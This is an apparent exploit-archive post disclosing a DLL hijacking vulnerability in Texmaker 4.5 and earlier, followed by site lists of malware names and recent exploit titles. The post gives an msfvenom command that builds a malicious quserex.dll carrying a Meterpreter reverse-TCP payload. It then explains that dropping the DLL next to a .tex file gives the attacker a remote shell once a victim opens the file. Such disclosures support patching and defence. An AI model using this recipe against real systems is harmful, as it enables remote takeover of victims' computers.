Texmaker 4.5 DLL Hijacking

Posted on 16 February 2016

# Exploit Title: TEXMAKER DLL HIJACKING VULNERABILTY # Date: FEB 14 2016 # Exploit Author: SHANTANU KHANDELWAL # Vendor Homepage: http://www.xm1math.net # Software Link: http://www.xm1math.net/texmaker/texmakerwin32_install.exe <http://www.winhex.com/winhex.zip> # Version: <= 4.5 # Tested on: WINDOWS XP 32 bit , Windows 8 TEXMAKER suffers DLL HIJACK Vulnerability from file type .tex Vulnerable DLL: quserex.dll Make Malicious dll : msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f dll LHOST=<HOST IP> LPORT=4444 > quserex.dll Exploit: Place a dummy .tex file with the malicious dll . When the file is opened in texmaker editor you will get shell

TOP

Malware :

SymbOS.Worm.Beselo.A
SymbOS.Worm.Beselo.B
SymbOS.Worm.Keaf.A
Trojan:SymbOS/ZeusMitmo.A
Trojan:SymbOS/MapUp

Last 20

Exploits :

Customer Support System 1.0 Cross Site Scripting
Xhibiter NFT Marketplace 1.10.2 SQL Injection
WordPress WPCode Lite 2.1.14 Cross Site Scripting
Azon Dominator Affiliate Marketing Script SQL Injection
Simple Laboratory Management System 1.0 SQL Injection

Last 20